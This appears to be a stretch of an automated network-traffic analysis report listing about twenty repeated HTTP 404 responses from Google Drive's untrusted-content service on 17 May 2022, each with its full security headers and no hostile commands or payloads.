                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VuKNatGtJlgotaVSQ49X4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:03 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-TNmkdkLZRbGSdG5jWWRc1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yFg6qvhttlCsQ096KditUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-+b1Jm6qe75dPXnJjuj2EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TmeQqhW4XW9GkQUMZxR6FA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WsFg1JMtD6Rfysx24vZEgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vbhEKudMOAS1RrrqdhiWsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dr2xnhQ1Mq5M8d3hW5EwWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-8FRwuho/AGlxiIMxuIuQuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:04 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NKhLoOGcdcQi8w6BTgpTXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-42i9Ku7AWJFx9dh3wnYF6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-F01gwGTljqSml87PjQMGTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yQ2ri+FV/6AvwIWEwg6doQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wmOomDbFQsDWgwkY0KvnAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-vA+1v6zTlvpMGq7mW6K3zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-J7wOWYmNpw6cwDhD1+QyFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-33ZsobbpJ7tMgQFqBXHg1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:05 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-VKin7ILfdfzJnErrkRx0pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:32:06 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-PIVxaof0aOE8c5ZmhAkaeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
